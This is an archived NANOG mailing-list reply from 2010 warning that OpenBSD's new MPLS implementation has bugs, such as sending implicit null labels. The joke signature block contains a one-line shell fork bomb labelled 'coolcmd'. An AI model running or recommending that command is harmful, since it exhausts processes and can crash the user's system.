[125771] in North American Network Operators' Group
Re: Mikrotik RouterOS
daemon@ATHENA.MIT.EDU (Thomas Habets)
Fri Apr 23 03:27:18 2010
Date: Fri, 23 Apr 2010 09:26:10 +0200 (CEST)
From: Thomas Habets <thomas@habets.pp.se>
To: Chris Cappuccio <chris@nmedia.net>
In-Reply-To: <20100421231422.GD5371@ref.nmedia.net>
Cc: nanog@nanog.org
Errors-To: nanog-bounces+nanog.discuss=bloom-picayune.mit.edu@nanog.org
On Wed, 21 Apr 2010, Chris Cappuccio wrote:
> OpenBSD post-4.7 (current) is about to get a full BGP MPLS VPN
> implementation and has ldp working too. Yeah baby
I wouldn't run MPLS with OpenBSD in production quite yet though. Until I
sent in a patch earlier this month it sent out implicit null (label 3)
over the wire, for example.
There are other bugs still there, but CVS doesn't exactly invite
outside help. Hint hint, BSD folks.
---------
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "thomas@habets.pp.se" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;